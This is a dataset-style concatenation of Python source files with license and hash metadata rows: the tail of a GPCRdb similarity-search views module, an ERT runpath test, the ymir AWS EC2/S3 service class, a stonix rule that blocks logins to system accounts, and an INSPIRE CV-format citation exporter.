'label': 'Continue to next step',
'url': '/similaritysearch/segmentselection',
'color': 'success',
},
}
class SegmentSelection(AbsSegmentSelection):
step = 2
number_of_steps = 3
docs = 'sequences.html#similarity-search-gpcrdb'
selection_boxes = OrderedDict([
('reference', True),
('segments', True),
('targets', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/similaritysearch/targetselection',
'color': 'success',
},
}
class TargetSelection(AbsTargetSelectionTable):
step = 3
number_of_steps = 3
docs = "sequences.html#similarity-search-gpcrdb"
title = "SELECT RECEPTORS"
description = "Select receptors in the table (below) or browse the classification tree (right). You can select entire" \
+ " families or individual receptors.\n\nOnce you have selected all your receptors, click the green button."
selection_boxes = OrderedDict([
("reference", True),
("segments", True),
("targets", True),
])
buttons = {
"continue": {
"label": "Next",
"onclick": "submitSelection('/similaritysearch/render');",
"color": "success",
},
}
# class TargetSelection(AbsTargetSelection):
# step = 3
# number_of_steps = 3
# docs = 'sequences.html#similarity-search-gpcrdb'
# selection_boxes = OrderedDict([
# ('reference', True),
# ('segments', True),
# ('targets', True),
# ])
# buttons = {
# 'continue': {
# 'label': 'Show similarity',
# 'url': '/similaritysearch/render',
# 'color': 'success',
# },
# }
def render_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
if simple_selection == False or not simple_selection.targets or not simple_selection.reference:
return redirect("/similaritysearch/referenceselection")
# create an alignment object
a = Alignment()
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
return render(request, 'similaritysearch/alignment.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns})
def render_fasta_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
response = render(request, 'alignment/alignment_fasta.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.fasta"
return response
def render_csv_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
response = render(request, 'alignment/alignment_csv.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.csv"
return response
|
apache-2.0
| -7,357,047,311,267,593,000
| 32.964497
| 124
| 0.669861
| false
| 3.994433
| false
| false
| false
|
andreabrambilla/libres
|
python/tests/res/enkf/test_runpath_list_ert.py
|
1
|
3354
|
import unittest
import os
from res.test import ErtTestContext
from tests import ResTest
from res.enkf import RunpathList, RunpathNode, ErtRunContext
from res.enkf.enums import EnkfInitModeEnum,EnkfRunType
from ecl.util.util import BoolVector
from res.util.substitution_list import SubstitutionList
class RunpathListTestErt(ResTest):
def test_an_enkf_runpath(self):
# TODO this test is flaky and we need to figure out why. See #1370
# enkf_util_assert_buffer_type: wrong target type in file (expected:104 got:0)
test_path = self.createTestPath("local/snake_oil_field/snake_oil.ert")
with ErtTestContext("runpathlist_basic", test_path) as tc:
pass
def test_assert_export(self):
with ErtTestContext("create_runpath_export" , self.createTestPath("local/snake_oil_no_data/snake_oil.ert")) as tc:
ert = tc.getErt( )
runpath_list = ert.getRunpathList( )
self.assertFalse( os.path.isfile( runpath_list.getExportFile( ) ))
ens_size = ert.getEnsembleSize( )
runner = ert.getEnkfSimulationRunner( )
fs_manager = ert.getEnkfFsManager( )
init_fs = fs_manager.getFileSystem("init_fs")
mask = BoolVector( initial_size = 25 , default_value = True )
runpath_fmt = ert.getModelConfig().getRunpathFormat( )
subst_list = SubstitutionList( )
itr = 0
jobname_fmt = ert.getModelConfig().getJobnameFormat()
run_context1 = ErtRunContext( EnkfRunType.INIT_ONLY , init_fs, None , mask , runpath_fmt, jobname_fmt, subst_list , itr )
runner.createRunPath( run_context1 )
self.assertTrue( os.path.isfile( runpath_list.getExportFile( ) ))
self.assertEqual( "test_runpath_list.txt" , os.path.basename( runpath_list.getExportFile( ) ))
def test_assert_symlink_deleted(self):
with ErtTestContext("create_runpath_symlink_deleted" , self.createTestPath("local/snake_oil_field/snake_oil.ert")) as tc:
ert = tc.getErt( )
runpath_list = ert.getRunpathList( )
ens_size = ert.getEnsembleSize()
runner = ert.getEnkfSimulationRunner()
mask = BoolVector( initial_size = ens_size , default_value = True )
fs_manager = ert.getEnkfFsManager()
init_fs = fs_manager.getFileSystem("init_fs")
# create directory structure
runpath_fmt = ert.getModelConfig().getRunpathFormat( )
subst_list = SubstitutionList( )
itr = 0
jobname_fmt = ert.getModelConfig().getJobnameFormat()
run_context = ErtRunContext( EnkfRunType.INIT_ONLY , init_fs, None , mask , runpath_fmt, jobname_fmt, subst_list , itr )
runner.createRunPath( run_context )
# replace field file with symlink
linkpath = '%s/permx.grdcel' % str(runpath_list[0].runpath)
targetpath = '%s/permx.grdcel.target' % str(runpath_list[0].runpath)
open(targetpath, 'a').close()
os.remove(linkpath)
os.symlink(targetpath, linkpath)
# recreate directory structure
runner.createRunPath( run_context )
# ensure field symlink is replaced by file
self.assertFalse( os.path.islink(linkpath) )
|
gpl-3.0
| -5,098,693,126,175,305,000
| 40.407407
| 133
| 0.637448
| false
| 3.515723
| true
| false
| false
|
mattvonrocketstein/ymir
|
ymir/service/amazon.py
|
1
|
9978
|
# -*- coding: utf-8 -*-
""" ymir.service.amazon
"""
import os
import time
import boto
from fabric.colors import yellow
from ymir import util
from ymir.service.base import AbstractService
class AmazonService(AbstractService):
""" """
def __init__(self, conn=None, **kargs):
""""""
self.conn = conn or util.aws.get_conn()
super(AmazonService, self).__init__(**kargs)
def _get_instance(self, strict=False):
""" """
conn = self.conn
name = self.template_data()['name']
i = util.aws.get_instance_by_name(name, conn)
if strict and i is None:
err = "Could not acquire instance! Is the name '{0}' correct?"
err = err.format(name)
self.report(err)
raise SystemExit(1)
return i
def setup_ip(self):
""" """
self.sync_tags()
self.sync_buckets()
self.sync_eips()
super(AmazonService, self).setup_ip()
@util.declare_operation
def s3(self):
""" show summary of s3 information for this service """
buckets = self.sync_buckets(quiet=True).items()
if not buckets:
self.report("this service is not using S3 buckets")
for bname, bucket in buckets:
keys = [k for k in bucket]
self.report(" {0} ({1} items) [{2}]".format(
bname, len(keys), bucket.get_acl()))
for key in keys:
print (" {0} (size {1}) [{2}]".format(
key.name, key.size, key.get_acl()))
@property
def _s3_conn(self):
return boto.connect_s3()
@property
def _username(self):
""" username data is accessible only as a property because
        it must be overridden for e.g. vagrant-based services
"""
return self._service_json['username']
@property
def _pem(self):
""" pem-file is accessible only as a property because
        it must be overridden for e.g. vagrant-based services
"""
return util.unexpand(self._service_json['pem'])
@util.declare_operation
def sync_buckets(self, quiet=False):
report = self.report if not quiet else util.NOOP
buckets = self.template_data()['s3_buckets']
report("synchronizing s3 buckets")
if buckets:
report(' buckets to create: {0}'.format(buckets))
else:
self.report(" no s3 buckets mentioned in service-definition")
conn = self._s3_conn
tmp = {}
for name in buckets:
report(" setting up s3 bucket: {0}".format(name))
tmp[name] = conn.create_bucket(name, location=self.S3_LOCATION)
return tmp
@util.declare_operation
def sync_eips(self, quiet=False):
""" synchronizes elastic IPs with service.json data """
report = self.report if not quiet else lambda *args, **kargs: None
report("synchronizing elastic ip's")
service_instance_id = self._status()['instance'].id
eips = self.template_data()['elastic_ips']
if not eips:
report(' no elastic IPs mentioned in service-definition')
return
addresses = [x for x in self.conn.get_all_addresses()
if x.public_ip in eips]
for aws_address in addresses:
report(" Address: {0}".format(aws_address))
if aws_address.instance_id is None:
report(" -> currently unassigned. "
"associating with this instance")
aws_address.associate(instance_id=service_instance_id)
elif aws_address.instance_id == service_instance_id:
report(" -> already associated with this service")
else:
report(" -> assigned to another instance {0}! (that seems bad)".format(
aws_address.instance_id))
sync_elastic_ips = sync_eips
@util.declare_operation
@util.require_running_instance
def sync_tags(self):
""" update aws instance tags from service.json `tags` field """
self.report('updating instance tags: ')
json = self.template_data()
tags = dict(
description=json.get('service_description', ''),
org=json.get('org_name', ''),
app=json.get('app_name', ''),
env=json.get("env_name", ''),
)
for tag in json.get('tags', []):
tags[tag] = 'true'
for tag in tags:
if not tags[tag]:
tags.pop(tag)
self.report(' {0}'.format(tags.keys()))
self._instance.add_tags(tags)
@util.declare_operation
@util.require_running_instance
def terminate(self, force=False):
""" terminate this service (delete from ec2) """
instance = self._instance
self.report("{0} slated for termination.".format(instance))
if force:
return self.conn.terminate_instances(
instance_ids=[instance.id])
else:
msg = ("This will terminate the instance {0} ({1}) and can "
"involve data loss. Are you sure? [y/n] ")
answer = None
name = self.template_data()['name']
while answer not in ['y', 'n']:
answer = raw_input(msg.format(instance, name))
if answer == 'y':
self.terminate(force=True)
@util.declare_operation
@util.require_running_instance
def mosh(self):
""" connect to this service with mosh """
self.report('connecting with mosh')
service_data = self.template_data()
util.mosh(self.status()['ip'],
username=self._username,
pem=service_data['pem'])
ssh = util.require_running_instance(AbstractService.ssh)
def _status(self):
""" retrieves service status information.
use this instead of self.status() if you want to quietly
retrieve information for use without actually displaying it
"""
tdata = self._service_json # NOT template_data(), that's cyclic
if not self._status_computed and self._debug_mode:
self.report("AWS profile: {0}".format(yellow(
os.environ.get('AWS_PROFILE', 'default'))))
name = tdata['name']
# DON'T use self._get_instance(); recursion
instance = util.aws.get_instance_by_name(name, self.conn)
result = dict(
instance=None, ip=None,
private_ip=None, tags=[],
status='terminated?',)
if instance:
result.update(
dict(
instance=instance,
tags=instance.tags,
status=instance.update(),
ip=instance.ip_address,
private_ip=instance.private_ip_address,
))
self._status_computed = result
return result
@util.declare_operation
def create(self, force=False):
""" create new instance of this service ('force' defaults to False)"""
self.report('creating ec2 instance', section=True)
conn = self.conn
i = self._get_instance()
if i is not None:
msg = ' instance already exists: {0} ({1})'
msg = msg.format(i, i.update())
self.report(msg)
if force:
self.report(' force is True, terminating it & rebuilding')
util._block_while_terminating(i, conn)
# might need to block and wait here
return self.create(force=False)
self.report(' force is False, refusing to rebuild it')
return
service_data = self.template_data()
# HACK: deal with unfortunate vpc vs. ec2-classic differences
reservation_extras = service_data.get('reservation_extras', {}).copy()
# set security group stuff in reservation extras
sg_names = service_data['security_groups']
if not sg_names:
err = ('without `security_groups` in service.json, '
'cannot create instance reservation')
raise SystemExit(err)
self.report(
"service description uses {0} as a security groups".format(sg_names))
tmp = {}
sgs = dict([[sg.id, sg.name] for sg in conn.get_all_security_groups()])
for sg_name in sg_names:
if sg_name not in sgs.values():
err = "could not find {0} amongst security groups at {1}"
err = err.format(sg_names, sgs.values())
raise SystemExit(err)
else:
_id = [_id for _id in sgs if sgs[_id] == sg_name][0]
self.report(" sg '{0}' is id {1}".format(sgs[_id], _id))
tmp[_id] = sgs[_id]
reservation_extras['security_group_ids'] = tmp.keys()
reservation = conn.run_instances(
image_id=service_data['ami'],
key_name=service_data['key_name'],
instance_type=service_data['instance_type'],
**reservation_extras)
instance = reservation.instances[0]
self.report(' no instance found, creating it now.')
self.report(' reservation-id:', instance.id)
util._block_while_pending(instance)
status = instance.update()
name = self.template_data()['name']
if status == 'running':
self.report(' instance is running.')
self.report(' setting tag for "Name": {0}'.format(
name))
instance.add_tag("Name", name)
else:
self.report('Weird instance status: ', status)
return None
time.sleep(5)
self.report("Finished with creation. Now run `fab setup`")
@util.declare_operation
def shell(self):
""" """
return util.shell(
conn=self.conn,
Service=self, service=self)
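# Rough sketch of how these operations tend to be driven (an assumption -- ymir
# normally wires them into fabric tasks via @util.declare_operation, and the exact
# constructor arguments depend on AbstractService):
#
#   svc = AmazonService(...)   # constructor kwargs are an assumption; see AbstractService
#   svc.create()               # reserve and tag the EC2 instance
#   svc.setup_ip()             # sync tags, S3 buckets and elastic IPs
#   svc.terminate()            # delete the instance when finished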
|
mit
| 7,567,753,346,309,193,000
| 36.511278
| 89
| 0.552315
| false
| 4.16792
| false
| false
| false
|
CSD-Public/stonix
|
src/stonix_resources/rules/BlockSystemAccounts.py
|
1
|
12193
|
###############################################################################
# #
# Copyright 2019. Triad National Security, LLC. All rights reserved. #
# This program was produced under U.S. Government contract 89233218CNA000001 #
# for Los Alamos National Laboratory (LANL), which is operated by Triad #
# National Security, LLC for the U.S. Department of Energy/National Nuclear #
# Security Administration. #
# #
# All rights in the program are reserved by Triad National Security, LLC, and #
# the U.S. Department of Energy/National Nuclear Security Administration. The #
# Government is granted for itself and others acting on its behalf a #
# nonexclusive, paid-up, irrevocable worldwide license in this material to #
# reproduce, prepare derivative works, distribute copies to the public, #
# perform publicly and display publicly, and to permit others to do so. #
# #
###############################################################################
"""
Created on Apr 2, 2013
The BlockSystemAccounts rule will search through /etc/passwd to determine if
there are any system accounts which currently allow login. If any are found
which do allow login, the fix method will set the login shell for those entries
in /etc/passwd to a non-interactive shell (/sbin/nologin), preventing future
logins from them. One exception is the 'root' account, which will not be blocked
because administrators require access to it in certain situations.
@author: Breen Malmberg
@change: 01/29/2014 Derek Walker revised
@change: 02/12/2014 Ekkehard Implemented self.detailedresults flow
@change: 02/12/2014 Ekkehard Implemented isapplicable
@change: 02/19/2014 Ekkehard Make sure report always runs
@change: 04/18/2014 Dave Kennel Updated to new style configuration item.
@change: 2014/10/17 Ekkehard OS X Yosemite 10.10 Update
@change: 2015/04/14 Dave Kennel Updated for new style isApplicable
@change: 2015/06/10 Breen Malmberg - updated author names; implemented correct
mac os x functionality; refactored code for readability; fixed pep8 violations
@change: 2015/08/28 Ekkehard [artf37764] : BlockSystemAccounts(40) - NCAF - OS X El Capitan 10.11
@change: 2015/11/09 Ekkehard - make eligible of OS X El Capitan
@change: 2017/07/07 Ekkehard - make eligible for macOS High Sierra 10.13
@change: 2017/11/13 Ekkehard - make eligible for OS X El Capitan 10.11+
@change: 2018/06/08 Ekkehard - make eligible for macOS Mojave 10.14
@change: 2018/10/50 Breen Malmberg - refactor of rule
@change: 2019/03/12 Ekkehard - make eligible for macOS Sierra 10.12+
@change: 2019/08/07 ekkehard - enable for macOS Catalina 10.15 only
"""
import os
import re
import traceback
from rule import Rule
from logdispatcher import LogPriority
from CommandHelper import CommandHelper
from stonixutilityfunctions import readFile, iterate
from stonixutilityfunctions import resetsecon
class BlockSystemAccounts(Rule):
"""this module ensures that no system accounts have a login shell"""
def __init__(self, config, enviro, logger, statechglogger):
"""
private method to initialize this module
:param config: configuration object instance
:param enviro: environment object instance
:param logger: logdispatcher object instance
:param statechglogger: statechglogger object instance
"""
Rule.__init__(self, config, enviro, logger, statechglogger)
self.logger = logger
self.environ = enviro
self.rulenumber = 40
self.rulename = 'BlockSystemAccounts'
self.formatDetailedResults("initialize")
self.compliant = False
self.mandatory = True
self.sethelptext()
self.rootrequired = True
datatype = 'bool'
key = 'BLOCKSYSACCOUNTS'
instructions = """If you have system accounts that need to have valid \
shells, set the value of this to False, or No."""
default = True
self.applicable = {'type': 'white',
'family': ['linux', 'solaris', 'freebsd'],
'os': {'Mac OS X': ['10.15', 'r', '10.15.10']}}
self.ci = self.initCi(datatype, key, instructions,
default)
self.guidance = ['CIS', 'NSA(2.3.1.4)', 'cce-3987-5', '4525-2',
'4657-3', '4661-5', '4807-4', '4701-9', '4669-8',
'4436-2', '4815-7', '4696-1', '4216-8', '4758-9',
'4621-9', '4515-3', '4282-0', '4802-5', '4806-6',
'4471-9', '4617-7', '4418-0', '4810-8', '3955-2',
'3834-9', '4408-1', '4536-9', '4809-0', '3841-4']
self.iditerator = 0
def report(self):
"""report on the status of the system's compliance with disallowing
system accounts to log in
:return: self.compliant - boolean; True if compliant, False if not
"""
self.detailedresults = ""
self.compliant = True
acceptable_nologin_shells = ["/sbin/nologin", "/dev/null", "", "/usr/bin/false"]
self.ch = CommandHelper(self.logger)
self.corrections_needed = []
try:
system_login_shells = self.getsysloginshells()
for acc in system_login_shells:
if system_login_shells[acc] not in acceptable_nologin_shells:
self.compliant = False
self.corrections_needed.append(acc)
if self.corrections_needed:
self.detailedresults += "\nThe following system accounts can log in:\n" + "\n".join(self.corrections_needed)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.compliant = False
self.detailedresults = traceback.format_exc()
self.logger.log(LogPriority.ERROR, self.detailedresults)
self.formatDetailedResults("report", self.compliant, self.detailedresults)
self.logdispatch.log(LogPriority.INFO, self.detailedresults)
return self.compliant
def getUIDMIN(self):
"""return this system's minimum user ID start value, if configured
:return: uid_min - string; system's user id starting value
"""
uid_min = ""
logindefs = "/etc/login.defs"
try:
# get normal user uid start value
logindefscontents = readFile(logindefs, self.logger)
if logindefscontents:
for line in logindefscontents:
if re.search("^UID_MIN", line, re.IGNORECASE):
sline = line.split()
uid_min = sline[1]
if not uid_min:
self.logger.log(LogPriority.DEBUG, "Unable to determine UID_MIN")
except IndexError:
pass
except IOError:
self.logger.log(LogPriority.DEBUG, "Failed to read uid_min from file")
return uid_min
return uid_min
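    # Illustrative /etc/login.defs line this parser looks for (the value is
    # distro-dependent): "UID_MIN   1000", in which case getUIDMIN() returns "1000".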
def getsystemaccounts(self):
"""
return a list of system accounts
:return: system_accounts_list - list of system accounts
"""
system_accounts_list = []
if self.environ.getosfamily() == "darwin":
try:
system_accounts_list = ["root", "nobody"]
get_sys_accounts_cmd = "/usr/bin/dscl . list /Users | grep -i _"
self.ch.executeCommand(get_sys_accounts_cmd)
system_accounts_list += self.ch.getOutput()
except OSError:
self.logger.log(LogPriority.DEBUG, "Failed to retrieve list of system accounts")
return system_accounts_list
else:
exclude_accounts = ["halt", "shutdown", "sync", "root"]
system_accounts_list = []
uid_min = self.getUIDMIN()
if not uid_min:
uid_min = "500"
f = open("/etc/passwd", "r")
contentlines = f.readlines()
f.close()
try:
for line in contentlines:
sline = line.split(":")
if int(sline[2]) < int(uid_min):
if sline[0] not in exclude_accounts:
system_accounts_list.append(sline[0])
except IndexError:
pass
return system_accounts_list
def getloginshell(self, account):
"""
retrieve the login shell, of the passed account, from passwd
:param account: string; name of user account to get info for
:return: loginshell - string; default login shell path for account
"""
loginshell = ""
try:
f = open("/etc/passwd", "r")
contentlines = f.readlines()
f.close()
except IOError:
self.logger.log(LogPriority.DEBUG, "Could not read from passwd file")
return loginshell
try:
for line in contentlines:
if re.search("^"+account, line, re.IGNORECASE):
sline = line.split(":")
loginshell = sline[6]
except IndexError:
pass
return loginshell
def getsysloginshells(self):
"""
return a dictionary of system accounts and their login shells
:return: system_login_shells - dictionary of system accounts and their login shells
"""
system_login_shells = {}
system_accounts = self.getsystemaccounts()
for acc in system_accounts:
system_login_shells[acc] = self.getloginshell(acc).strip()
return system_login_shells
def setdefaultloginshell(self, account, shell):
"""
set default shell for given user account
:param account: string; name of user account to set default shell for
:param shell: the type of shell to set for the given user account
"""
change_shell_cmd = "/usr/bin/chsh -s " + shell + " " + account
self.ch.executeCommand(change_shell_cmd)
def fix(self):
"""The fix method will apply the required settings to the system.
self.rulesuccess will be updated if the rule does not succeed.
:return: self.rulesuccess - boolean; True if fix succeeds, False if not
"""
self.detailedresults = ""
self.rulesuccess = True
path = "/etc/passwd"
tmppath = path + ".stonixtmp"
self.iditerator = 0
newcontentlines = []
try:
if not self.ci.getcurrvalue():
return self.rulesuccess
f = open(path, "r")
contentlines = f.readlines()
f.close()
for line in contentlines:
sline = line.split(":")
if sline[0] in self.corrections_needed:
sline[6] = "/sbin/nologin\n"
line = ":".join(sline)
newcontentlines.append(line)
tf = open(tmppath, "w")
            tf.writelines(newcontentlines)
            tf.close()
self.iditerator += 1
myid = iterate(self.iditerator, self.rulenumber)
event = {'eventtype': 'conf',
'filepath': path}
self.statechglogger.recordchgevent(myid, event)
self.statechglogger.recordfilechange(path, tmppath, myid)
os.rename(tmppath, path)
os.chown(path, 0, 0)
os.chmod(path, 420)
resetsecon(path)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.rulesuccess = False
self.detailedresults = traceback.format_exc()
self.logger.log(LogPriority.ERROR, self.detailedresults)
self.formatDetailedResults("fix", self.rulesuccess, self.detailedresults)
self.logdispatch.log(LogPriority.INFO, self.detailedresults)
return self.rulesuccess
|
gpl-2.0
| 4,207,096,394,589,483,500
| 36.749226
| 124
| 0.580415
| false
| 4.137428
| true
| false
| false
|
nikpap/inspire-next
|
inspirehep/utils/cv_latex_html_text.py
|
1
|
10784
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2016 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this licence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
import re
from .export import MissingRequiredFieldError, Export
from inspirehep import config
class Cv_latex_html_text(Export):
"""Class used to output CV format(html) and CV format(text)."""
def __init__(self, record, format_type, separator):
super(Cv_latex_html_text, self).__init__(record)
self.record = record
self.format_type = format_type
self.separator = separator
def format(self):
"""Return CV format export for single record."""
formats = {
'record': self._format_record,
}
return formats['record']()
def _format_record(self):
required_fields = ['title', 'author', 'arxiv']
optional_fields = ['doi', 'publi_info']
try:
return self._format_entry(required_fields, optional_fields)
except MissingRequiredFieldError as e:
raise e
def _format_entry(self, req, opt):
"""
:raises: MissingRequiredFieldError
"""
out = ''
out += self._fetch_fields(req, opt) + '%s' % self.separator
return out
def _fetch_fields(self, req_fields, opt_fields=[]):
fields = {
'title': self._get_title,
'author': self._get_author,
'arxiv': self._get_arxiv,
'doi': self._get_doi,
'publi_info': self._get_publi_info,
}
out = ''
for field in req_fields:
value = fields[field]()
if value:
out += self._format_output_row(field, value)
# RAISE EXCEPTION HERE IF REQ FIELD IS MISSING
for field in opt_fields:
value = fields[field]()
if value:
out += self._format_output_row(field, value)
return out
def _format_output_row(self, field, value):
out = ''
if field == 'title':
if self.format_type == 'cv_latex_html':
out += unicode('<a href="' + config.SERVER_NAME + '/record/' +
str(self.record['control_number']) + '">' +
value + '.</a>' + self.separator)
else:
out += u'{0}{1}'.format(value, self.separator)
elif field == 'author':
if len(value) == 1:
out += u'By {0}.{1}'.format(value[0], self.separator)
elif len(value) > 8:
if 'collaboration' in self.record:
try:
collaboration = self.record[
'collaboration'][0]['value']
if 'Collaboration' in collaboration:
out += unicode('By ' + collaboration +
'(' + value[0] + ' et al.).' +
self.separator)
else:
out += unicode('By ' + collaboration +
' Collaboration (' +
value[0] + ' et al.).' +
self.separator)
except IndexError:
pass
else:
out += u'By {0} et al..{1}'.format(value[0],
self.separator)
else:
out += u'By {0}.{1}'.format(', '.join(value), self.separator)
elif field == 'arxiv':
if self.format_type == 'cv_latex_html':
out += u'[{0}].{1}'.format(value, self.separator)
else:
out += u'{0}.{1}'.format(value, self.separator)
elif field == 'doi':
dois_splitted = value.split(',')
for k, v in enumerate(dois_splitted):
v = '<a href="http://dx.doi.org/' + v + '">' + v + '</a>'
dois_splitted[k] = v
out += u'{0}.{1}'.format(', '.join(out for out in dois_splitted),
self.separator)
elif field == 'publi_info':
out += u'{0}.{1}'.format(', '.join(out for out in value),
self.separator)
return out
def _get_author(self):
"""Return list of name(s) of the author(s)."""
re_last_first = re.compile(
r'^(?P<last>[^,]+)\s*,\s*(?P<first_names>[^\,]*)(?P<extension>\,?.*)$'
)
result = []
if 'authors' in self.record:
for author in self.record['authors']:
if 'full_name' in author and author['full_name']:
if isinstance(author['full_name'], list):
author_full_name = ''.join(full_name for full_name
in author['full_name'])
first_last_match = re_last_first.search(
author_full_name)
if first_last_match:
result.append(
first_last_match.group('first_names') +
' ' + first_last_match.
group('last') +
first_last_match.
group('extension')
)
else:
first_last_match = re_last_first.search(
author['full_name'])
if first_last_match:
result.append(
first_last_match.group('first_names') +
' ' + first_last_match.
group('last') +
first_last_match.group('extension')
)
elif 'corporate_author' in self.record:
for corp_author in self.record['corporate_author']:
if corp_author:
result.append(corp_author)
return result
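    # Hedged illustration (the name is invented for the example): an author record
    # with full_name "Maldacena, Juan M." is split by re_last_first into
    # last='Maldacena' and first_names='Juan M.', so _get_author() yields
    # 'Juan M. Maldacena'.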
def _get_title(self):
"""Return record title(s)"""
record_title = ''
if 'titles' in self.record:
if isinstance(self.record['titles'], list):
for title in self.record['titles']:
if 'title' in title:
record_title = title['title']
break
else:
record_title = self.record['titles']['title'].strip()
if isinstance(self.record['titles'], list):
for subtitle in self.record['titles']:
if 'subtitle' in subtitle and subtitle['subtitle']:
record_title += ' : ' + subtitle['subtitle']
break
else:
if 'subtitle' in self.record['titles']:
record_title += ' : ' + self.record['titles']['subtitle']
if record_title.upper() == record_title or \
record_title.find('THE') >= 0:
record_title = ' '.join([word.capitalize() for word
in record_title.split(' ')])
return record_title
def _get_publi_info(self):
result = []
if 'publication_info' in self.record:
journal_title, journal_volume, year, journal_issue, pages = \
('', '', '', '', '')
for field in self.record['publication_info']:
out = ''
if 'journal_title' in field:
if isinstance(field['journal_title'], list):
if not ('journal_volume' in field or
'journal_issue' in field or
'page_artid' in field or
'doi' in self.record):
journal_title = 'Submitted to:' +\
field['journal_title'][-1]
else:
journal_title = field['journal_title'][-1]
else:
if not ('journal_volume' in field or
'journal_issue' in field or
'page_artid' in field or
'doi' in self.record):
journal_title = 'Submitted to:' +\
field['journal_title']
else:
journal_title = field['journal_title']
if 'journal_volume' in field:
journal_volume = ' ' + field['journal_volume']
if 'year' in field:
if isinstance(field['year'], list):
year = ' (' + str(field['year'][-1]) + ')'
else:
year = ' (' + str(field['year']) + ')'
if 'journal_issue' in field:
if field['journal_issue']:
journal_issue = ' ' + \
field['journal_issue'] + ','
if 'page_artid' in field:
if field['page_artid']:
if isinstance(field['page_artid'], list):
pages = ' ' + field['page_artid'][-1]
else:
pages = ' ' + field['page_artid']
out += journal_title + journal_volume + year + \
journal_issue + pages
result.append(out)
if not result:
for field in self.record['publication_info']:
if 'pubinfo_freetext' in field and len(field) == 1:
return field['pubinfo_freetext']
return result
|
gpl-2.0
| -8,740,075,710,879,147,000
| 42.659919
| 82
| 0.443064
| false
| 4.729825
| false
| false
| false
|